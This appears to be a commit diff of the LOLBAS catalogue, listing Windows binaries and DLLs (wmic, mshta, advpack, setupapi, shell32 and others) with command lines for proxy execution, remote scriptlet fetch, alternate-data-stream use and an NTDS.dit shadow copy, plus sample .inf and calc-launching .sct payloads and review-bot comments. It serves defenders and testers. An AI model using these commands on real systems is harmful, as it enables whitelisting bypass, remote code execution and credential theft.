| Create a volume shadow copy of NTDS.dit that can be copied. | ||||
|  | ||||
| wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
| Execute a script contained in the target .XSL file hosted on a remote server. | ||||
|  | ||||
| wmic.exe os get /format:"MYXSLFILE.xsl" | ||||
| Executes JScript or VBScript embedded in the target XSL stylesheet. | ||||
|  | ||||
| wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" | ||||
| Executes JScript or VBScript embedded in the target remote XSL stylsheet. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory | ||||
|   * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html | ||||
|   * https://twitter.com/subTee/status/986234811944648707 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\wbem\wmic.exe | ||||
|   * c:\windows\sysWOW64\wbem\wmic.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
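Review bot: the "get-wmiobject –class ... –computer" line is a PowerShell cmdlet, not a wmic.exe invocation, and its parameter switches use en dashes instead of hyphens, so it fails if pasted; either move it out of this entry or fix the dashes. The vssadmin example is also misdescribed: "/for=" takes a volume, not a file path, and the "> c:\not_the_NTDS.dit" redirect captures vssadmin's text output rather than producing a copy of NTDS.dit. "stylsheet" in the last description is a typo.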
							
								
								
									
19
Archive-Old-Version/OSBinaries/Wab.exe.md
Normal file
							| @@ -0,0 +1,19 @@ | ||||
| ## Wab.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Wab.exe | ||||
| Loads a DLL configured in the registry under HKLM. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ | ||||
|   * https://twitter.com/Hexacorn/status/991447379864932352 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Program Files\Windows Mail\wab.exe     | ||||
|   * C:\Program Files (x86)\Windows Mail\wab.exe     | ||||
|     | ||||
| * Notes: Thanks to Adam - @Hexacorn | ||||
| Requires registry changes, Requires Administrative Access   | ||||
|     | ||||
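Review bot: the description says a DLL is loaded from a registry value under HKLM but does not name the value; the linked hexacorn.com post does, and the entry should too, since that value is what a defender would monitor. The "Requires registry changes, Requires Administrative Access" line sits on a bare line after the Notes bullet and renders outside it, and the Full path lines carry trailing whitespace.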
							
								
								
									
17
Archive-Old-Version/OSBinaries/Wscript.exe.md
Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## Wscript.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| wscript c:\ads\file.txt:script.vbs | ||||
| Executes the .VBS script stored as an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * ? | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\wscript.exe | ||||
|   * c:\windows\sysWOW64\wscript.exe | ||||
|     | ||||
| * Notes: Thanks to ?   | ||||
|     | ||||
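Review bot: the Resources and Notes sections are unfilled ("?"); the ADS execution post already cited in the Rundll32 and mshta entries (https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) covers this case and is the obvious reference, and the credit line should be filled in or dropped.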
							
								
								
									
22
Archive-Old-Version/OSBinaries/Xwizard.exe.md
Normal file
							| @@ -0,0 +1,22 @@ | ||||
| ## Xwizard.exe | ||||
| * Functions: DLL hijack, Execute | ||||
| ``` | ||||
|  | ||||
| xwizard.exe | ||||
| Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. | ||||
|  | ||||
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | ||||
| Xwizard.exe running a custom class that has been added to the registry. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ | ||||
|   * https://www.youtube.com/watch?v=LwDHX7DVHWU | ||||
|   * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\xwizard.exe | ||||
|   * c:\windows\sysWOW32\xwizard.exe | ||||
|     | ||||
| * Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer   | ||||
|     | ||||
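Review bot: the second Full path entry reads "c:\windows\sysWOW32\xwizard.exe", which should be SysWOW64 as in every other entry. The second description ("Xwizard.exe running a custom class that has been added to the registry") is a fragment; reword it to say that RunWizard invokes the CLSID given on the command line, which must have been registered in the registry beforehand, so the reader knows the registry write is a prerequisite.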
							
								
								
									
26
Archive-Old-Version/OSBinaries/hh.exe.md
Normal file
							| @@ -0,0 +1,26 @@ | ||||
| ## hh.exe | ||||
| * Functions: Download, Execute | ||||
| ``` | ||||
|  | ||||
| HH.exe http://www.google.com | ||||
| Opens google's web page with HTML Help. | ||||
|  | ||||
| HH.exe C:\ | ||||
| Opens c:\\ with HTML Help. | ||||
|  | ||||
| HH.exe c:\windows\system32\calc.exe | ||||
| Opens calc.exe with HTML Help. | ||||
|  | ||||
| HH.exe http://some.url/script.ps1 | ||||
| Open the target PowerShell script with HTML Help. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\hh.exe | ||||
|   * c:\windows\sysWOW64\hh.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
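Review bot: the second description reads "Opens c:\\ with HTML Help."; the doubled backslash is a markdown escape that has no effect inside a code fence and should be "C:\". "google's" should be capitalised. The fourth example is the one that exercises the Download function, so its description should say the script is fetched from the URL before being opened.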
							
								
								
									
30
Archive-Old-Version/OSBinaries/mshta.exe.md
Normal file
							| @@ -0,0 +1,30 @@ | ||||
| ## mshta.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| mshta.exe evilfile.hta | ||||
| Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|  | ||||
| mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | ||||
| Executes VBScript supplied as a command line argument. | ||||
|  | ||||
| mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
| Executes JavaScript supplied as a command line argument. | ||||
|  | ||||
| mshta.exe "C:\ads\file.txt:file.hta" | ||||
| Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md | ||||
|   * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | ||||
|   * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\mshta.exe | ||||
|   * C:\Windows\SysWOW64\mshta.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
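Review bot: the two script-URL examples are defanged inconsistently: the VBScript one points at `https[:]//webserver/payload[.]sct` while the JavaScript one uses a live `https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct`; pick one convention, and since this commit moves the Payload directories under `Archive-Old-Version/`, check that the `master/OSBinaries/Payload/` path still resolves or pin it to a commit hash. The two .HTA examples (the plain file and `C:\ads\file.txt:file.hta`) share an identical description; the second should say the .HTA is read from an alternate data stream, which is what the Read ADS function tag refers to.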
							
								
								
									
Archive-Old-Version/OSBinaries/odbcconf.exe.md (Normal file, 21 lines)
							| @@ -0,0 +1,21 @@ | ||||
| ## odbcconf.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| odbcconf -f file.rsp | ||||
| Load DLL specified in target .RSP file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b | ||||
|   * https://github.com/woanware/application-restriction-bypasses | ||||
|   * https://twitter.com/subTee/status/789459826367606784 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\odbcconf.exe     | ||||
|   * c:\windows\sysWOW64\odbcconf.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer | ||||
| See the Playloads folder for an example .RSP file. | ||||
|    | ||||
|     | ||||
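Review bot: the Notes line reads "See the Playloads folder for an example .RSP file"; fix the typo (Payloads) and name the file, since a reader of the web portal cannot browse a folder from this entry. The single example `odbcconf -f file.rsp` is described as "Load DLL specified in target .RSP file" without saying which directive in the response file performs the load, so nobody can write their own .rsp from this page. Trailing whitespace after `c:\windows\system32\odbcconf.exe`.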
							
								
								
									
Archive-Old-Version/OSBinaries/reg.exe.md (Normal file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| ## reg.exe | ||||
| * Functions: Export Reg, Add ADS, Import Reg | ||||
| ``` | ||||
|  | ||||
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | ||||
| Export the target Registry key and save it to the specified .REG file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\reg.exe | ||||
|   * c:\windows\sysWOW64\reg.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
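Review bot: the Functions line lists Export Reg, Add ADS and Import Reg, but the only example covers export; add an import example or drop Import Reg. The example `reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg` is described as saving to "the specified .REG file", which hides the point of the entry: the destination `file.txt:evilreg.reg` is an alternate data stream on file.txt, and the description should say so since that is the Add ADS function being demonstrated.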
							
								
								
									
Archive-Old-Version/OSBinaries/regedit.exe.md (Normal file, 20 lines)
							| @@ -0,0 +1,20 @@ | ||||
| ## regedit.exe | ||||
| * Functions: Write ADS, Read ADS, Import registry | ||||
| ``` | ||||
|  | ||||
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | ||||
| Export the target Registry key to the specified .REG file. | ||||
|  | ||||
| regedit C:\ads\file.txt:regfile.reg" | ||||
| Import the target .REG file into the Registry. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\regedit.exe | ||||
|   * C:\Windows\SysWOW64\regedit.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
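Review bot: the import example `regedit C:\ads\file.txt:regfile.reg"` has an unbalanced trailing double quote, so a copy-paste fails; drop it or quote the whole path. As in reg.exe.md, both descriptions speak of "the specified .REG file" without mentioning that the file is an alternate data stream, which is the Write ADS / Read ADS behaviour the Functions line advertises. Function naming also differs between the two entries ("Import Reg" in reg.exe.md, "Import registry" here); align them so the portal can group on them.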
							
								
								
									
Archive-Old-Version/OSLibraries/Advpack.dll.md (Normal file, 32 lines)
							| @@ -0,0 +1,32 @@ | ||||
| ## Advpack.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). | ||||
|  | ||||
| rundll32.exe advpack.dll,LaunchINFSection test.inf,,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). | ||||
|  | ||||
| rundll32.exe Advpack.dll,RegisterOCX calc.exe | ||||
| Launch executable by calling the RegisterOCX function. | ||||
|  | ||||
| rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" | ||||
| Launch executable by calling the RegisterOCX function. | ||||
|  | ||||
| rundll32.exe Advpack.dll,RegisterOCX test.dll | ||||
| Launch a DLL payload by calling the RegisterOCX function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ | ||||
|   * https://twitter.com/ItsReallyNick/status/967859147977850880 | ||||
|   * https://twitter.com/bohops/status/974497123101179904 | ||||
|   * https://twitter.com/moriarty_meng/status/977848311603380224 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\advpack.dll | ||||
|   * c:\windows\sysWOW64\advpack.dll | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)   | ||||
|     | ||||
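Review bot: both LaunchINFSection descriptions say "Remote fetch and execute a COM Scriptlet", but whether anything is fetched depends entirely on the .inf passed in; link Payload/Advpack.inf from this commit so the reader knows the section name in `rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,` has to match the .inf. Consistency nits: `c:\\test.inf` uses doubled backslashes while the next line uses a bare `test.inf`, and `rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"` drops `.exe` and adds a space after the comma, unlike the neighbouring examples.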
							
								
								
									
Archive-Old-Version/OSLibraries/Ieadvpack.dll.md (Normal file, 28 lines)
							| @@ -0,0 +1,28 @@ | ||||
| ## Ieadvpack.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe | ||||
| Launch executable by calling the RegisterOCX function. | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,RegisterOCX test.dll | ||||
| Launch a DLL payload by calling the RegisterOCX function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/991695411902599168 | ||||
|   * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
|   * https://twitter.com/0rbz_/status/974472392012689408 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\ieadvpack.dll | ||||
|   * c:\windows\sysWOW64\ieadvpack.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)   | ||||
|     | ||||
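Review bot: the Notes line credits @pabraeken for "RegisterOCX - Cmd", but unlike Advpack.dll.md there is no cmd.exe RegisterOCX example here, only `calc.exe` and `test.dll`; either add the missing example or correct the credit. Same backslash inconsistency as Advpack.dll.md (`c:\\test.inf` vs `test.inf`), and the LaunchINFSection examples should point at Payload/Ieadvpack.inf from this commit.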
							
								
								
									
Archive-Old-Version/OSLibraries/Ieframe.dll.md (Normal file, 22 lines)
							| @@ -0,0 +1,22 @@ | ||||
| ## Ieframe.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" | ||||
| Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. | ||||
|  | ||||
| rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz | ||||
| Renamed URL file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ | ||||
|   * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ | ||||
|   * https://twitter.com/bohops/status/997690405092290561 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Ieframe.dll | ||||
|   * c:\windows\sysWOW64\Ieframe.dll | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops   | ||||
|     | ||||
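Review bot: the second example, `rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz`, is described only as "Renamed URL file."; spell out what it demonstrates, namely that OpenURL goes by file content rather than extension, so a .url payload under any name works. The first description, "via proxy through a(n) URL (information) file", is hard to parse; say that the .url file's URL field points at the executable, and since no sample .url ships in this commit, a one-line example of its contents would help. Path escaping also differs between the two lines (`"C:\test\calc.url"` vs `c:\\test\\calc-url-file.zz`).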
							
								
								
									
Archive-Old-Version/OSLibraries/Mshtml.dll.md (Normal file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| ## Mshtml.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" | ||||
| Invoke an HTML Application. Note - Pops a security warning and a print dialogue box. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/998567549670477824 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Mshtml.dll | ||||
|   * c:\windows\sysWOW64\Mshtml.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken   | ||||
|     | ||||
							
								
								
									
Archive-Old-Version/OSLibraries/Payload/Advpack.inf (Normal file, 14 lines)
							| @@ -0,0 +1,14 @@ | ||||
| [version] | ||||
| Signature=$chicago$ | ||||
| AdvancedINF=2.5 | ||||
|  | ||||
| [DefaultInstall_SingleUser] | ||||
| UnRegisterOCXs=UnRegisterOCXSection | ||||
|  | ||||
| [UnRegisterOCXSection] | ||||
| %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct | ||||
|  | ||||
| [Strings] | ||||
| AppAct = "SOFTWARE\Microsoft\Connection Manager" | ||||
| ServiceName="Yay" | ||||
| ShortSvcName="Yay" | ||||
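Review bot: the `[Strings]` section (AppAct, ServiceName, ShortSvcName) is referenced by nothing else in the file, so it is dead weight in a minimal PoC and should be removed or commented. The `[UnRegisterOCXSection]` line `%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct` is the whole technique, so document it in the .md entry (`%11%` is the system directory and the third field is the scriptlet URL handed to scrobj.dll); the URL targets the pre-archive `master/OSLibraries/Payload/` path that this commit moves, so confirm it still resolves.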
							
								
								
									
Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct (Normal file, 44 lines)
							| @@ -0,0 +1,44 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
| 	> | ||||
|  | ||||
| 	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| 	<!-- DFIR --> | ||||
| 	<!--		.sct files are downloaded and executed from a path like this --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|  | ||||
|  | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee -->  | ||||
|         <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
|  | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
|  | ||||
| 		]]> | ||||
| 	</script> | ||||
| </registration> | ||||
|  | ||||
| <public> | ||||
|     <method name="Exec"></method> | ||||
| </public> | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	function Exec() | ||||
| 	{ | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); | ||||
| 	} | ||||
|  | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
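Review bot: the comment opened by `<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll` is never closed on that line; the following `<!-- DFIR -->` ends it instead, which leaves a `--` sequence inside a comment that strict XML parsers reject. Close the first comment with `-->`. The file also carries two different payloads: the `<registration>` script runs calc.exe when the scriptlet is registered or unregistered (the path LaunchINFSection exercises), while the public `Exec()` method runs notepad.exe and is only reached by callers such as the mshta example that invoke `.Exec()`; a comment saying which one fires for which caller would spare testers confusion. Typo: "arbitary".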
							
								
								
									
Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf (Normal file, 14 lines)
							| @@ -0,0 +1,14 @@ | ||||
| [version] | ||||
| Signature=$chicago$ | ||||
| AdvancedINF=2.5 | ||||
|  | ||||
| [DefaultInstall_SingleUser] | ||||
| UnRegisterOCXs=UnRegisterOCXSection | ||||
|  | ||||
| [UnRegisterOCXSection] | ||||
| %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct | ||||
|  | ||||
| [Strings] | ||||
| AppAct = "SOFTWARE\Microsoft\Connection Manager" | ||||
| ServiceName="Yay" | ||||
| ShortSvcName="Yay" | ||||
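Review bot: this file is byte-for-byte identical to Payload/Advpack.inf, including the scriptlet URL, which points at `Advpack_calc.sct` rather than the `Ieadvpack_calc.sct` added alongside it; either point it at its own scriptlet or drop the duplicate and have Ieadvpack.dll.md reference Advpack.inf. The unused `[Strings]` section from Advpack.inf is duplicated here as well.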
							
								
								
									
Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct (Normal file, 44 lines)
							| @@ -0,0 +1,44 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
| 	> | ||||
|  | ||||
| 	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| 	<!-- DFIR --> | ||||
| 	<!--		.sct files are downloaded and executed from a path like this --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|  | ||||
|  | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee -->  | ||||
|         <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
|  | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
|  | ||||
| 		]]> | ||||
| 	</script> | ||||
| </registration> | ||||
|  | ||||
| <public> | ||||
|     <method name="Exec"></method> | ||||
| </public> | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	function Exec() | ||||
| 	{ | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); | ||||
| 	} | ||||
|  | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
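Review bot: identical copy of Payload/Advpack_calc.sct, with the same unclosed `<!-- regsvr32 ...` comment and the same calc.exe/notepad.exe split between the registration script and `Exec()`; nothing in this commit references it (Ieadvpack.inf points at Advpack_calc.sct), so it is an orphan. Deduplicate, or if both are kept, fix the comment in both.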
							
								
								
									
Archive-Old-Version/OSLibraries/Pcwutl.dll.md (Normal file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| ## Pcwutl.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe pcwutl.dll,LaunchApplication calc.exe | ||||
| Launch executable by calling the LaunchApplication function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/harr0ey/status/989617817849876488 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Pcwutl.dll | ||||
|   * c:\windows\sysWOW64\Pcwutl.dll | ||||
|     | ||||
| * Notes: Thanks to Matt harr0ey - @harr0ey   | ||||
|     | ||||
							
								
								
									
Archive-Old-Version/OSLibraries/Setupapi.dll.md (Normal file, 23 lines)
							| @@ -0,0 +1,23 @@ | ||||
| ## Setupapi.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf | ||||
| Launch an executable file via the InstallHinfSection function and .inf file section directive. | ||||
|  | ||||
| rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/994742106852941825 | ||||
|   * https://twitter.com/subTee/status/951115319040356352 | ||||
|   * https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   * https://github.com/huntresslabs/evading-autoruns | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Setupapi.dll | ||||
|   * c:\windows\sysWOW64\Setupapi.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)   | ||||
|     | ||||
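Review bot: the two examples pass different mode values (132 in `rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf`, 128 in the setupapi.dll line) with no explanation; note that 128 makes the INF's own directory the default source path and the low bits select reboot behaviour, so a reader knows which to use. The COM-scriptlet variant depends entirely on the content of `C:\\Tools\\shady.inf`, but no sample .inf for setupapi is included, unlike the advpack entries. The two lines also disagree on form (`rundll32 setupapi,` vs `rundll32.exe setupapi.dll,`, single vs doubled backslashes).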
							
								
								
									
Archive-Old-Version/OSLibraries/Shdocvw.dll.md (Normal file, 22 lines)
							| @@ -0,0 +1,22 @@ | ||||
| ## Shdocvw.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" | ||||
| Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. | ||||
|  | ||||
| rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz" | ||||
| Renamed URL file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ | ||||
|   * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ | ||||
|   * https://twitter.com/bohops/status/997690405092290561 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Shdocvw.dll | ||||
|   * c:\windows\sysWOW64\Shdocvw.dll | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops   | ||||
|     | ||||
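Review bot: this entry duplicates Ieframe.dll.md line for line (same OpenURL examples, same three resources, same credits); that is fine if both DLLs export OpenURL, but it inherits the same weak descriptions ("a(n) URL (information) file", "Renamed URL file.") and the same missing sample .url, so fix them in both or cross-reference one from the other.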
							
								
								
									
Archive-Old-Version/OSLibraries/Shell32.dll.md (Normal file, 26 lines)
							| @@ -0,0 +1,26 @@ | ||||
| ## Shell32.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe shell32.dll,Control_RunDLL payload.dll | ||||
| Launch DLL payload. | ||||
|  | ||||
| rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe | ||||
| Launch executable payload. | ||||
|  | ||||
| rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" | ||||
| Launch executable payload with arguments. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Hexacorn/status/885258886428725250 | ||||
|   * https://twitter.com/pabraeken/status/991768766898941953 | ||||
|   * https://twitter.com/mattifestation/status/776574940128485376 | ||||
|   * https://twitter.com/KyleHanslovan/status/905189665120149506 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\shell32.dll | ||||
|   * c:\windows\sysWOW64\shell32.dll | ||||
|     | ||||
